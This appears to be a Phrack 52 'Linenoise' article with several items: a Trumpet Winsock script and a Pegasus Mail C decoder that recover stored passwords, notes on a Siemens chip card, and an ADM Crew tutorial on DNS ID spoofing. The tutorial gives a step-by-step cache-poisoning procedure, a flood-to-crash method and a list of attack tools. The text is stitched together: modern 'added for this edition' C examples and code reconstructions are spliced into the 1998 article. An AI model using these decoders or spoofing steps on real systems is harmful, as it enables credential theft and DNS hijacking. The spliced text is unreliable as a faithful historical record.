---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20

-------------------------[ P H R A C K   5 2   L I N E N O I S E

--------[ Various

0x1>-------------------------------------------------------------------------

Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I felt obligated to share a small piece of code that I don't like to admit that I created, far earlier than the esteemed Jeep's published work. As his requires access to a Pascal compiler and does not seem to be coded with portability in mind, the fact that my script requires Trumpet itself to run does not seem too great a hindrance. The irony is that not only is the "cipher" a simple obfuscating XOR, but that Trumpet itself will decode it for you.

<++> password.cmd
# Put in Trumpet Winsock directory, run under "Dialer/Other"
# Cannot currently use any file other than trumpwsk.ini,
# apparently due to implementation errors in the "load" function
display \n
display "Trumpet Password Thief 1.0, 8-18-95"\n
display \n
if [load $username]
    display "username: "
    display $username\n
else
    display "ERR: cannot load username"\n
end
if [load $password]
    display "password: "
    display $password\n
else
    display "ERR: cannot load password"\n
end
display \n
<-->

- anonymous

0x2>-------------------------------------------------------------------------

Another password decoder for ya... written long ago, I just never bothered to release it...
<++> peg-dec.c
/*
 * Pegasus Mail Password Decoder v1.0 by Belgorath
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Decoding/Encoding Tables: one table per password length (1 to 8
   characters); entry [pos-1] is subtracted from the stored value at
   position pos */
int dec1[1]= { 44 };
int dec2[2]= { 16, 21 };
int dec3[3]= { 10, 22, 28 };
int dec4[4]= { 37, 28, 21, 7 };
int dec5[5]= { 21, 22, 37, 28, 9 };
int dec6[6]= { 22, 15, 28, 42, 17, 2 };
int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 };
int dec8[8]= { 9, 2, 7, 20, 44, 22, 28, 23 };
int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 };

/* numch: password length, ch: stored value, pos: 1-based position */
int decode_char(int numch, int ch, int pos)
{
    ch-=decz[numch-1][pos-1];
    if(ch<-127) ch+=256;
    return ch;
}

int main(void)
{
    int zz,x,nc;
    char *tz, *p;
    int inps[20];

    nc=0;
    tz=calloc(8192,1);           /* the original used malloc() and hoped it zeroed */
    if(tz==NULL) return 1;
    printf("Enter Pegasus Mail Password: ");
    if(fgets(tz,8192,stdin)==NULL) return 1;

    /* Fun input parsing loop. The rest of this loop and the output code are
       missing from this copy of the article; what follows is a reconstruction
       that reads the stored password as a list of decimal values separated by
       non-digits (at most 8, the size of the largest table) and prints the
       decoded characters. The delimiter is an assumption. */
    p=tz;
    while( *p && nc<8 ) {
        if(!isdigit((unsigned char)*p)) { p++; continue; }
        x=0;
        while(isdigit((unsigned char)*p)) x=x*10+(*p++ - '0');
        inps[nc++]=x;
    }
    if(nc==0) { printf("no values read\n"); return 1; }

    printf("Decoded: ");
    for(zz=0;zz<nc;zz++) putchar(decode_char(nc,inps[zz],zz+1));
    putchar('\n');
    free(tz);
    return 0;
}
<-->

0x3>-------------------------------------------------------------------------

                    :------------------------------:
                    : Siemens Chip Card Technology :
                    :         by Yggdrasil         :
                    :------------------------------:

Chip cards differ from one another in memory size, type of memory (PROM or EEPROM), security logic and micro-controller. This article discusses the Siemens SLE4404 chip card. The SLE4404 is employed for electronic purse cards and bank transactions, cellular telephony (prepaid cards), user IDs for access control, etc. (some examples: SmartCard, ViaCard and the Italian Bancomat). Its data is accessed over a simple TTL-level serial channel; the card needs a +5 V supply (Vcc) from an external source.

Inside the chip
~~~~~~~~~~~~~~~

The chip card has an EEPROM consisting of a 416-bit matrix (26 rows of 16 bits) that is protected by security logic providing access control.
This is the logic diagram:

                    +------------------------+     +------------------+
                    |    Address Counter     | --> |  Column Decoder  |
                    +------------------------+     +------------------+
                              ^                             |
                              |                          16 |
                              |                             v
  C3,C8,C2,C5 -->  +-----------+             +---------+     +------------------+
  C1 (Vcc)    -->  | Control & |             |   Row   |     | User mem 208 bit |
  C7 (I/O)    <--> | Security  |             | Decoder | --> | Sec unit 192 bit |
                   |   Logic   |             |         | 26  | Special mem unit |
                   +-----------+             +---------+     +------------------+
                         ^                        ^
                         |                        |
                         +------------------------+

The SLE4404 memory is subdivided into three main blocks: one is read only (a "PROM" containing the manufacturer code and/or a serial number and an expiration date), the second is both readable and writeable (user memory), and the last block can only be written while the lock-out fuse is still intact (see the [fuse] entries below).

This is the memory map:

BLOCK                SIZE (BIT)  ADDRESS   READABLE  WRITEABLE  ERASEABLE
-----------------------------------------------------------------------------
Manufacturer code        16      0-15      Yes       No         No
Application ROM          48      16-63     Yes       No         No
User code                16      64-79     [fuse]    U.C.       U.C.
Error counter             4      80-83     Yes       Yes        U.C.
EEPROM #1                12      84-95     Yes       Yes        U.C.
EEPROM #2                16      96-111    Yes       U.C.       U.C.
Frame memory block
  - F.M. config           2      112-113   Yes       Yes        U.C./R.C.
  - Frame memory        206      114-319   [cfg]     [cfg]      U.C./R.C.
Frame code               32      320-351   [fuse]    [fuse]     [cfg]
Frame counter            64      352-415   Yes       Yes        [cfg]
-----------------------------------------------------------------------------

Meaning of abbreviations:

  U.C.   - User code required (each time the code is entered the error
           counter is decremented)
  R.C.   - Frame code required (each time the code is entered the frame
           counter is decremented)
  [fuse] - Operation allowed ONLY IF the lock-out fuse is not blown
  [cfg]  - Operation allowed according to the frame memory configuration

Frame memory configuration table:

BIT 112  BIT 113  MEMORY MODE   READABLE  WRITEABLE
-----------------------------------------------------------------------------
   0        0     Secret ROM    Yes       No
   0        1     R.O.M.        Yes       No
   1        0     Secret PROM   U.C.      U.C.
   1        1     P.R.O.M.      U.C.      U.C.
-----------------------------------------------------------------------------

The first 16-bit block is the Manufacturer Code. The following 48-bit block, the Application ROM, contains another code (manufacturer sub-code or info, serial number, sub-type of card, etc.). The User Code is the access code (PIN) required to read, write or erase memory. It can be changed as long as the lock-out fuse has not been blown, while the error counter can be modified even after the fuse is blown... Please note that access to memory is blocked after four incorrect access attempts (tracked by the 4-bit error counter, which is decremented on every code entry). The same holds for the Frame Code and the Frame Counter, except that the number of incorrect attempts is limited to three instead of four. Finally, the Frame Memory is generally used to store personal user information or the credit balance (money that can be drawn in a bank transaction, or the remaining "virtual" credit on a prepaid cellular card).

The Pin-out
~~~~~~~~~~~

This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected):

    +-------+-------+        Contact  Pin  Info
    |  C 1  |  C 5  |        -------  ---  ------------------------------
    |       |       |           1      6   Vcc +5V
    +-------+-------+           2      5   Reset
    |  C 2  |  C 6  |           3      4   Clock
    |       |       |           4      3   Test input - N.C.
    +-------+-------+           5      8   Ground
    |  C 3  |  C 7  |           6      7   N.C.
    |       |       |           7      1   Bi-directional I/O data line
    +-------+-------+           8      2   Control input (data change)
    |  C 4  |  C 8  |
    |       |       |
    +-------+-------+

    "I am for ever walking upon these shores,
     betwixt the sand and the foam.
     The high tide will erase my foot-prints,
     and the wind will blow away the foam.
     But the sea and the shore will remain
     For ever."
                                        -- Gibran K. Gibran

0x4>-------------------------------------------------------------------------

                           ..oO THE ADM CreW Oo..
                                  presents

                              DNS ID Hacking


--[1]-- DNS ID Hacking Presentation

You might be wondering what DNS ID hacking (or spoofing) is all about. It is not the usual way of hacking or spoofing a daemon: it relies on a weakness in the DNS protocol itself. Worse, the DNS ID hack/spoof is very efficient and very strong, as no generation of DNS daemons escapes it (not even WinNT!).


--[1.1]-- DNS Protocol mechanism explanation

First you must know how DNS works. I will only explain the most important facts of the protocol. To do that, we follow the path of a DNS request from A to Z!

Name resolution example:

The client (bla.bibi.com) sends a request to resolve the name "www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" (also written ns.bibi.com below) as its name server. Let's take a look at the following picture..

    /------------------------------------\
    | 111.1.2.123 = bla.bibi.com         |
    | 111.1.2.222 = dns.bibi.com         |
    | format:                            |
    |   IP_ADDR:PORT->IP_ADDR:PORT       |
    | ex:                                |
    |   111.1.2.123:2999->111.1.2.222:53 |
    \------------------------------------/

    ...
    gethostbyname("www.heike.com");
    ...

    [bla.bibi.com]                              [dns.bibi.com]
    111.1.2.123:1999 ---> [?www.heike.com] ---> 111.1.2.222:53

Here we see our name resolution request, sent from source port 1999 to the DNS on port 53 (note: DNS always listens on port 53). Now that dns.bibi.com has received the request from bla.bibi.com, it has to resolve the name itself:

    [dns.bibi.com]                                 [ns.internic.net]
    111.1.2.222:53 ---> [dns?www.heike.com] ---> 198.41.0.4:53

dns.bibi.com asks the root name server ns.internic.net for the address of www.heike.com. The root server does not have it and instead refers dns.bibi.com to a name server which has authority over the '.com' domain (note: we send the request to the Internic first because it could already have the answer in its cache).
    [ns.internic.net]                                     [ns.bibi.com]
    198.41.0.4:53 ---> [ns for .com is 144.44.44.4] ---> 111.1.2.222:53

Here we can see that ns.internic.net answered ns.bibi.com (the DNS that has authority over the domain bibi.com) that the name server for .com has the IP 144.44.44.4 (let's call it ns.for.com). Now ns.bibi.com asks ns.for.com for the address of www.heike.com, but this one doesn't have it either and refers us to the DNS of heike.com, which has authority over heike.com.

    [ns.bibi.com]                               [ns.for.com]
    111.1.2.222:53 ---> [?www.heike.com] ---> 144.44.44.4:53

The answer from ns.for.com (note that it goes back to ns.bibi.com at 111.1.2.222):

    [ns.for.com]                                           [ns.bibi.com]
    144.44.44.4:53 ---> [ns for heike.com is 31.33.7.4] ---> 111.1.2.222:53

Now that we know which IP address has authority over the domain "heike.com" (we'll call it ns.heike.com), we ask it for the IP of the machine www.heike.com.

    [ns.bibi.com]                               [ns.heike.com]
    111.1.2.222:53 ---> [?www.heike.com] ---> 31.33.7.4:53

We now have our answer:

    [ns.heike.com]                                        [ns.bibi.com]
    31.33.7.4:53 ---> [www.heike.com == 31.33.7.44] ---> 111.1.2.222:53

Great, we have the answer and can forward it to our client bla.bibi.com:

    [ns.bibi.com]                                           [bla.bibi.com]
    111.1.2.222:53 ---> [www.heike.com == 31.33.7.44] ---> 111.1.2.123:1999

Now bla.bibi.com knows the IP of www.heike.com.

Now let's imagine we'd like to get the name of a machine from its IP. To do that we proceed a bit differently, as the IP has to be transformed first.

Reverse name lookup resolution:

    100.20.40.3 becomes 3.40.20.100.in-addr.arpa

This transformation is only used for reverse resolution (IP to name). Let's look at a practical example with the IP address of www.heike.com (31.33.7.44, or "44.7.33.31.in-addr.arpa" after translation into the form DNS understands).

    ...
    gethostbyaddr("31.33.7.44");
    ...
We send our request to ns.bibi.com:

    [bla.bibi.com]                                          [ns.bibi.com]
    111.1.2.123:2600 ---> [?44.7.33.31.in-addr.arpa] ---> 111.1.2.222:53

Which is forwarded to ns.internic.net:

    [ns.bibi.com]                                           [ns.internic.net]
    111.1.2.222:53 ---> [?44.7.33.31.in-addr.arpa] ---> 198.41.0.4:53

ns.internic.net sends back the IP of a name server which has authority over '31.in-addr.arpa':

    [ns.internic.net]                                               [ns.bibi.com]
    198.41.0.4:53 ---> [DNS for 31.in-addr.arpa is 144.44.44.4] ---> 111.1.2.222:53

Now ns.bibi.com asks the same question to the DNS at 144.44.44.4:

    [ns.bibi.com]                                           [ns.for.com]
    111.1.2.222:53 ---> [?44.7.33.31.in-addr.arpa] ---> 144.44.44.4:53

And so on. The mechanism is nearly the same as for name resolution.


--[1.2]-- DNS packet header

Here is the format of a DNS message:

    +---------------------------+---------------------------+
    | ID (the famous :)         | flags                     |
    +---------------------------+---------------------------+
    | number of questions       | number of answers         |
    +---------------------------+---------------------------+
    | number of authority RRs   | number of additional RRs  |
    +---------------------------+---------------------------+
    |                                                       |
    \                       QUESTION                        \
    |                                                       |
    +-------------------------------------------------------+
    |                                                       |
    \                        ANSWER                         \
    |                                                       |
    +-------------------------------------------------------+
    |                                                       |
    \                 Stuff etc.. No matter                 \
    |                                                       |
    +-------------------------------------------------------+


--[1.3]-- Structure of DNS packets

__ID__

The 16-bit ID identifies each DNS packet. Since exchanges between name servers go from port 53 to port 53, and there may be more than one request in flight at a time, the ID is the only thing that lets the server tell the different DNS requests apart. We'll talk about it later..

__flags__

The flags field is divided into several parts:

              4 bits                    3 bits (always 0)
                |                             |
    [ QR | opcode | AA | TC | RD | RA |     zero     | rcode ]
       |            |    |    |    |                    |
     1 bit          1 bit each (4 flags)              4 bits

QR = If the QR bit = 0, the packet is a question, otherwise it's an answer.
opcode = 0 for a standard query, 1 for an inverse query, 2 for a server status request (we don't need the other modes).

AA = If set to 1, the name server's answer is authoritative.

TC = Truncated: the message was cut short (does not matter for us).

RD = If set to 1, it means "Recursion Desired": for example, when bla.bibi.com asks ns.bibi.com to resolve a name, this flag tells the DNS to take the request on itself and resolve it completely.

RA = If set to 1, recursion is available. A name server sets this bit in its answers if it supports recursion.

zero = Three bits that must be zero.

rcode = The return code of the request: 0 means "no error", 3 means "name error" (the name does not exist). The other values are of no importance to us.

DNS QUESTION:

Here is the format of a DNS question:

    +-----------------------------------------------------------------------+
    |                          name of the question                         |
    +-----------------------------------------------------------------------+
    |        type of question        |            type of query             |
    +--------------------------------+--------------------------------------+

The name is encoded as a sequence of labels, each preceded by its length in one byte, terminated by a zero byte. For example, www.heike.com becomes

    [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]

For a reverse lookup the format stays the same: 44.33.88.123.in-addr.arpa becomes

    [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]

[note]: a compression format exists, but we won't cover it.

type of question:

Here are the values we will use most of the time (there are many more, but these are the only relevant ones):

    name   value
    A    |   1  |  IP address (resolving a name to an IP)
    PTR  |  12  |  Pointer (resolving an IP to a name)

type of query:

Despite the name used here, this second 16-bit field is really the query class (QCLASS), which is 1 for Internet data. It only happens to carry the same value as the A type, which is why the examples below fill both fields with htons(1).
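The header and question section above, as an added worked example written for this edition (not code from the article or from the ADM tools): it encodes a name into the length-prefixed label form, builds the 12-byte header plus question with every 16-bit field in network order, decodes a name back out of a packet with bounds checks, and builds the in-addr.arpa name for a reverse lookup. The sample name, ID and address are the article's; the function names and the explicit rejection of compression pointers (which the article leaves out) are this example's own choices.

```c
/* Added example: DNS header + question encoding as described in the text.
 * Not from the article or the ADM tools. Sample values are the article's
 * (ID 1999, www.heike.com, 31.33.7.44); the function names are ours. */
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HDRLEN 12
#define TYPE_A     1
#define TYPE_PTR   12
#define CLASS_IN   1

/* "www.heike.com" -> [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].
 * Returns the encoded length, or -1 for an empty label, a label longer
 * than 63 bytes, a name longer than 255 bytes, or a too-small buffer. */
int encode_name(const char *name, uint8_t *out, size_t outlen)
{
    size_t pos = 0;
    while (*name) {
        const char *dot = strchr(name, '.');
        size_t lab = dot ? (size_t)(dot - name) : strlen(name);
        if (lab == 0 || lab > 63 || pos + lab + 2 > 255 || pos + lab + 2 > outlen)
            return -1;
        out[pos++] = (uint8_t)lab;
        memcpy(out + pos, name, lab);
        pos += lab;
        name += lab;
        if (*name == '.')
            name++;
    }
    if (pos + 1 > outlen)
        return -1;
    out[pos++] = 0;                      /* root label terminates the name */
    return (int)pos;
}

/* Inverse of encode_name(), reading from a packet at offset `off`. Every
 * read is bounds-checked against pktlen. A length octet with its top two
 * bits set is a compression pointer; it is rejected rather than followed,
 * since the article does not cover compression. Returns the offset just
 * past the name (where the type field starts), or -1. */
int decode_name(const uint8_t *pkt, size_t pktlen, size_t off, char *out, size_t outlen)
{
    size_t o = 0;
    while (off < pktlen) {
        uint8_t lab = pkt[off++];
        if (lab == 0) {
            if (o >= outlen) return -1;
            out[o] = '\0';
            return (int)off;
        }
        if (lab & 0xC0)                  /* compression pointer: unsupported */
            return -1;
        if (off + lab > pktlen || o + lab + 2 > outlen)
            return -1;
        if (o)
            out[o++] = '.';
        memcpy(out + o, pkt + off, lab);
        o += lab;
        off += lab;
    }
    return -1;                           /* ran off the packet before the 0 */
}

static void put16(uint8_t *p, uint16_t v)
{
    v = htons(v);
    memcpy(p, &v, 2);
}

/* Header + question, as in the "ns.bibi.com asks ns.heike.com" packet:
 * ID, flags QR=0/opcode=0/RD=1, one question, then name/type/class. */
int build_query(uint16_t id, const char *name, uint16_t qtype, uint8_t *buf, size_t buflen)
{
    if (buflen < DNS_HDRLEN + 5)
        return -1;
    memset(buf, 0, DNS_HDRLEN);
    put16(buf + 0, id);
    put16(buf + 2, 0x0100);              /* RD=1, every other flag bit 0 */
    put16(buf + 4, 1);                   /* one question */
    int n = encode_name(name, buf + DNS_HDRLEN, buflen - DNS_HDRLEN - 4);
    if (n < 0)
        return -1;
    size_t off = DNS_HDRLEN + n;
    put16(buf + off, qtype);             /* "type of question" */
    put16(buf + off + 2, CLASS_IN);      /* "type of query", really the class */
    return (int)(off + 4);
}

/* 31.33.7.44 -> "44.7.33.31.in-addr.arpa" for a PTR query. */
int reverse_name(const char *ip, char *out, size_t outlen)
{
    unsigned a, b, c, d;
    if (sscanf(ip, "%u.%u.%u.%u", &a, &b, &c, &d) != 4 ||
        a > 255 || b > 255 || c > 255 || d > 255)
        return -1;
    int n = snprintf(out, outlen, "%u.%u.%u.%u.in-addr.arpa", d, c, b, a);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    uint8_t pkt[64];
    char name[256];
    int n = build_query(1999, "www.heike.com", TYPE_A, pkt, sizeof pkt);
    for (int i = 0; i < n; i++)
        printf("%02x%s", pkt[i], (i % 16 == 15) ? "\n" : " ");
    printf("\n");
    if (decode_name(pkt, (size_t)n, DNS_HDRLEN, name, sizeof name) > 0)
        printf("question name decodes back to %s\n", name);
    if (reverse_name("31.33.7.44", name, sizeof name) == 0)
        printf("PTR name for 31.33.7.44: %s\n", name);
    return 0;
}
```

build_query() writes exactly the bytes the diagrams in this section show: ID 1999, flags 0x0100, one question, then [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] followed by type 1 and class 1, 31 bytes in all. decode_name() never reads past pktlen and refuses a length octet of the form 0xC0.., so a packet using the compression format mentioned in the note above is reported as unsupported rather than misparsed.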
DNS ANSWER:

Here is the format of an answer (a resource record, RR):

    +------------------------------------------------------------------------+
    |                           name of the domain                           |
    +------------------------------------------------------------------------+
    |              type               |               class                  |
    +---------------------------------+--------------------------------------+
    |                           TTL (time to live)                           |
    +------------------------------------------------------------------------+
    |      resource data length       |                                      |
    |---------------------------------+                                      |
    |                              resource data                             |
    +------------------------------------------------------------------------+

name of the domain: the domain name the resource record refers to. It is stored the same way as in the question: for the resolution of www.heike.com, the "name of the domain" field contains [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].

type: the same values as the "type of question" field in the question part of the packet.

class: equal to 1 for Internet data.

time to live: the number of seconds the information may be kept in a name server's cache.

resource data length: the length of the res<br>ource data; for example, a length of 4 means the resource data is 4 bytes long.
resource data: the data itself; here the IP address (at least in our case).

I will offer a little example that explains this better. Here is what happens when ns.bibi.com asks ns.heike.com for www.heike.com's address:

    ns.bibi.com:53 ---> [?www.heike.com] ---> ns.heike.com:53     (Phear Heike ;)

    +---------------------------------+--------------------------------------+
    | ID = 1999                       | QR = 0  opcode = 0  RD = 1           |
    +---------------------------------+--------------------------------------+
    | number of questions = htons(1)  | number of answers = 0                |
    +---------------------------------+--------------------------------------+
    | number of authority RRs = 0     | number of additional RRs = 0         |
    +---------------------------------+--------------------------------------+

    +------------------------------------------------------------------------+
    | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                 |
    +------------------------------------------------------------------------+
    | type of question = htons(1)     | type of query = htons(1)             |
    +---------------------------------+--------------------------------------+

That is the question.
Now let's look at the answer from ns.heike.com:

    ns.heike.com:53 ---> [IP of www.heike.com is 31.33.7.44] ---> ns.bibi.com:53

    +---------------------------------+-------------------------------------------+
    | ID = 1999                       | QR = 1  opcode = 0  RD = 1  AA = 1  RA = 1 |
    +---------------------------------+-------------------------------------------+
    | number of questions = htons(1)  | number of answers = htons(1)              |
    +---------------------------------+-------------------------------------------+
    | number of authority RRs = 0     | number of additional RRs = 0              |
    +---------------------------------+-------------------------------------------+

    +-----------------------------------------------------------------------------+
    | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                      |
    +-----------------------------------------------------------------------------+
    | type of question = htons(1)     | type of query = htons(1)                  |
    +---------------------------------+-------------------------------------------+

    +-----------------------------------------------------------------------------+
    | name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                        |
    +-----------------------------------------------------------------------------+
    | type = htons(1)                 | class = htons(1)                          |
    +---------------------------------+-------------------------------------------+
    | time to live = 999999                                                       |
    +-----------------------------------------------------------------------------+
    | resource data length = htons(4) | resource data = inet_addr("31.33.7.44")   |
    +---------------------------------+-------------------------------------------+

Yah! That's all for now :))

Here is the analysis. In the answer:

    QR = 1 because it's an answer :)
    AA = 1 because the name server has authority over its domain
    RA = 1 because recursion is available

Good =) I hope you understood that, because you will need it for what follows.


--[2.0]-- DNS ID hack/spoof

Now it's time to explain clearly what DNS ID hacking/spoofing is.
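Before the walk-through, the race this section describes, as an added example written for this edition (not ADM's code and not one of the tools listed later). The victim resolver is reduced to its ID generator, and a spoofed answer counts as accepted when its ID equals the ID of the victim's outstanding query. The model follows the procedure given below: learn one ID through a name server the attacker can watch (ns1.provnet.fr in the text), then flood the victim's next lookup with answers carrying IDs leaked+1 .. leaked+window. Two generators are compared: the old BIND behaviour reported by SNI (random start, then +1 per query) and a fresh random 16-bit ID per query. The `noise` parameter, unrelated queries the victim issues in between, and the xorshift generator are assumptions of the model, not anything the article states.

```c
/* Added example: a model of the ID race from section 2 (not ADM code).
 * The victim resolver is reduced to its ID generator; an "answer" is
 * accepted when its ID equals the ID of the victim's outstanding query.
 * Assumptions: the attacker learns one ID via a name server it can
 * observe, up to `noise` unrelated queries follow, then it floods
 * IDs leaked+1 .. leaked+window. */
#include <stdint.h>
#include <stdio.h>

typedef struct {
    int      sequential;   /* 1: random start, then +1 per query (old BIND) */
    uint16_t next;         /* next ID in sequential mode */
    uint32_t rng;          /* xorshift32 state; deterministic for the demo */
} resolver_t;

static uint32_t xorshift32(uint32_t *s)
{
    uint32_t x = *s;
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    return *s = x;
}

void resolver_init(resolver_t *r, int sequential, uint32_t seed)
{
    r->sequential = sequential;
    r->rng = seed ? seed : 1;
    r->next = (uint16_t)xorshift32(&r->rng);      /* random starting ID */
}

/* ID the resolver puts on its next outgoing query. */
uint16_t resolver_next_id(resolver_t *r)
{
    if (r->sequential)
        return r->next++;
    return (uint16_t)xorshift32(&r->rng);
}

/* One run of the procedure:
 *  1. attacker asks the victim for (random).provnet.fr; the victim's
 *     query to ns1.provnet.fr carries `leaked`, which the attacker sees
 *  2. `other` unrelated lookups (0..noise) consume IDs in between
 *  3. attacker asks for the name to poison; that query carries `target`
 *  4. spoofed answers with IDs leaked+1 .. leaked+window arrive
 * Returns 1 if one of the spoofed IDs equals `target`. */
int attack_trial(resolver_t *victim, int window, int noise, uint32_t *atk_rng)
{
    uint16_t leaked = resolver_next_id(victim);
    int other = (int)(xorshift32(atk_rng) % (uint32_t)(noise + 1));
    for (int i = 0; i < other; i++)
        (void)resolver_next_id(victim);
    uint16_t target = resolver_next_id(victim);
    for (int k = 1; k <= window; k++)
        if ((uint16_t)(leaked + k) == target)
            return 1;
    return 0;
}

/* Fraction of `trials` in which a spoofed answer is accepted. */
double success_rate(int sequential, int window, int noise, int trials, uint32_t seed)
{
    resolver_t victim;
    uint32_t atk_rng = seed ^ 0x9e3779b9u;
    int hits = 0;
    if (!atk_rng)
        atk_rng = 1;
    resolver_init(&victim, sequential, seed);
    for (int t = 0; t < trials; t++)
        hits += attack_trial(&victim, window, noise, &atk_rng);
    return (double)hits / trials;
}

int main(void)
{
    const int window = 10, trials = 20000;
    printf("%-22s %-6s %s\n", "ID generator", "noise", "spoof accepted");
    for (int noise = 0; noise <= 20; noise += 10) {
        printf("%-22s %-6d %.4f\n", "sequential (old BIND)", noise,
               success_rate(1, window, noise, trials, 12345u));
        printf("%-22s %-6d %.4f\n", "random 16-bit", noise,
               success_rate(0, window, noise, trials, 12345u));
    }
    return 0;
}
```

With a window of ten spoofed answers the incrementing generator is beaten on every trial when no other lookup intervenes, and still about half the time when up to twenty do; the random generator drops to roughly 10/65536 per attempt, which is the ratio the "send 200 or 300 requests" method below tries to improve by brute force. A real attack additionally has to beat the genuine answer in time and pass the victim's checks on source address, port and question; those are outside this model.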
As explained before, the only way for the DNS daemon to match answers to questions is the ID field in the packet. Look at this example:

    ns.bibi.com:53 ---> [?www.heike.com] ---> ns.heike.com:53

So you only have to spoof the IP of ns.heike.com and deliver your false answer to ns.bibi.com before ns.heike.com does!

    ns.bibi.com <------- . . . . . . . . . . . ns.heike.com
        |
        |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com

But in practice you have to guess the right ID :) If you are on a LAN, you can sniff the ID and answer before the name server (easy on a local network :). If you want to do this remotely you don't have a lot of choices; there are four basic methods:

1.) Try all possible values of the 16-bit ID field. You must answer before the NS does (ns.heike.com in this example). This method is hopeless unless you already know the ID, or some other condition favours predicting it.

2.) Send several DNS requests (200 or 300) in order to increase the chance of hitting the right ID.

3.) Flood the DNS so that it cannot do its work. The name server will crash and log the following error:

    >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT

At that point the named daemon is out of order :)

4.) Or use the vulnerability in BIND discovered by SNI (Secure Networks, Inc.) together with ID prediction (we will discuss this in a bit).

##################### Windows ID Vulnerability ###########################

I found a serious vulnerability in Windows 95 (I haven't tested it on WinNT). Imagine my little friend is on Windows 95: Windows IDs are extremely easy to predict because the ID is "1" by default :))) and "2" for the second question (if two questions are in flight at the same time).

######################## BIND Vulnerability ##############################

There is a vulnerability in BIND (discovered by SNI, as stated earlier). In fact, DNS IDs are easily predictable: you only have to sniff one exchange with a DNS in order to do what you want.
Let me explain... BIND picks a random ID at startup, but then only increments it for the following questions ... =))) It's easy to exploit this vulnerability. Here is the way:

1. Be able to sniff the messages that arrive at some DNS you can watch (ns.dede.com in this example).

2. Ask NS.victim.com to resolve (random).dede.com. NS.victim.com will ask ns.dede.com to resolve (random).dede.com:

    ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com

3. Now you have the ID of the message from NS.victim.com, so you know which ID range you'll have to use (ID = 444 in this example).

4. Then make your real resolution request, e.g. www.microsoft.com, to NS.victim.com:

    (you) ---> [?www.microsoft.com] ---> ns.victim.com
    ns.victim.com ---> [?www.microsoft.com ID = 446] ---> ns.microsoft.com

5. Flood ns.victim.com with spoofed answers, starting at the ID (444) you already have and incrementing it each time:

    ns.microsoft.com ---> [www.microsoft.com = 1.1.1.1 ID = 444] ---> ns.victim.com
    ns.microsoft.com ---> [www.microsoft.com = 1.1.1.1 ID = 445] ---> ns.victim.com
    ns.microsoft.com ---> [www.microsoft.com = 1.1.1.1 ID = 446] ---> ns.victim.com
    ns.microsoft.com ---> [www.microsoft.com = 1.1.1.1 ID = 447] ---> ns.victim.com
    ns.microsoft.com ---> [www.microsoft.com = 1.1.1.1 ID = 448] ---> ns.victim.com
    ns.microsoft.com ---> [www.microsoft.com = 1.1.1.1 ID = 449] ---> ns.victim.com

(Now that you know DNS IDs are predictable and only increase, you flood ns.victim.com with spoofed answers carrying IDs 444 and up ;)

*** ADMsnOOfID does this.

There is another way to exploit this vulnerability without root on any DNS. The mechanism is very simple; here is the explanation.

We send ns.victim.com a resolution request for (random).provnet.fr:

    (you) ---> [?(random).provnet.fr] ---> ns.victim.com

Then ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr. There is nothing new here, but the interesting part begins here.
From this point you flood ns.victim.com with spoofed answers (with ns1.provnet.fr's IP as source) carrying IDs from 100 to 110...

    (spoof) ---> [(random).provnet.fr is 1.2.3.4 ID=100] ---> ns.victim.com
    (spoof) ---> [(random).provnet.fr is 1.2.3.4 ID=101] ---> ns.victim.com
    (spoof) ---> [(random).provnet.fr is 1.2.3.4 ID=102] ---> ns.victim.com
    (spoof) ---> [(random).provnet.fr is 1.2.3.4 ID=103] ---> ns.victim.com
    .....

After that, we ask ns.victim.com whether (random).provnet.fr has an IP. If ns.victim.com gives us an IP for (random).provnet.fr, then one of our spoofed answers was accepted and we have found the correct ID :) Otherwise we repeat the attack with the next range until we find the ID. It's a bit long, but it's effective. And nothing forbids you from doing this with friends ;)

This is how ADMnOg00d works ;)
-------------------------------

##########################################################################

Here you will find 5 programs:

    ADMkillDNS  - very simple DNS spoofer
    ADMsniffID  - sniff a LAN and reply with false DNS answers before the NS
    ADMsnOOfID  - a DNS ID spoofer (you'll need to be root on a NS)
    ADMnOg00d   - a DNS ID predictor (no need to be root on a NS)
    ADMdnsfuckr - a very simple denial of service attack to disable a DNS

Have fun!! :)

Note: You can find source and binaries of these programs at ftp.janova.org/pub/ADM. I'm going to write a little HOWTO soon, which will be on janova. You need to install libpcap on your machine before compiling the ADMID programs :)

ADM Crew.

Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love these guys)

Special Thanks: ackboo, and of course Secure Networks, Inc.
(SNI) at www.secnet.com for finding the vulnerability =)

<++> ADMIDpack/ADM-spoof.c
/************************************************************************/
/*             ADM spoofing routine for spoofed UDP                     */
/************************************************************************/
#define IPHDRSIZE  sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)

/* The header names of the twelve #include lines were lost from this copy
   of the article; these are the system headers the code below needs.
   "ip.h" and "udp.h" are ADM's own headers (struct iphdr with saddr/daddr
   as struct in_addr, and struct udphdr) and are not on this page. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
